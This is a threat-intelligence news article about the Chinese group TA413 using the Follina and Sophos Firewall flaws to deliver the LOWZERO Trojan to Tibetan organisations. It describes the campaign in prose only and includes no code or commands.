How Chinese threat actors are using recently discovered zero day flaws in office and Sophos firewall

By deploying a new Trojan named LOWZERO, integrated into an espionage campaign aimed against Tibetan organizations, the Chinese APT known as TA413 is exploiting a variety of flaws in Microsoft Office and Sophos Firewall.

The majority of the targets were businesses connected to the exiled Tibetan administration as well as organizations connected to the Tibetan community. They leveraged the remote code execution flaws CVE-2022-1040 and CVE-2022-30190 (sometimes referred to as “Follina”) in Sophos Firewall and Microsoft Office, respectively, to carry out the attacks.

Given that this organization is specifically renowned for using well-known and documented methodologies, the technical team at Recorded Future finds it quite unique that this APT incorporates new techniques and access ways so swiftly. Since at least 2020, TA413—also known as LuckyCat—has been utilizing malware like ExileRAT, Sepulcher, and the nefarious Mozilla Firefox browser plugin FriarFox to attack organizations and people connected to the Tibetan community.

It wasn’t until June 2022 that this group’s use of the “Follina” vulnerability came to light for the first time. The Proofpoint team submitted this report despite being unable to identify the cyberattack’s goal. Additionally, it is known that it was a component of a spear-phishing effort in May 2022 that disseminated a malicious RTF file that downloaded the LOWZERO Trojan by abusing flaws in Microsoft Equation Editor. They accomplished this using the Royal Road RTF tool, which has been linked to a significant number of cyberattacks involving China.

Another phishing email targeting a Tibetan recipient was discovered in late May. This email had a Microsoft Word attachment that attempted to use the “Follina” vulnerability to launch a custom PowerShell command that would download the aforementioned Trojan from a remote server. When the infected system is identified as a target of interest by the attacker, the Trojan in question, LOWZERO, is capable of downloading further modules from the command and control (C2) server.

The exploitation of freshly released and zero-day vulnerabilities by TA413 is typical of larger patterns with Chinese cyber espionage groups, as exploits frequently show up in use by a number of different Chinese activity groups before being widely available to the general public.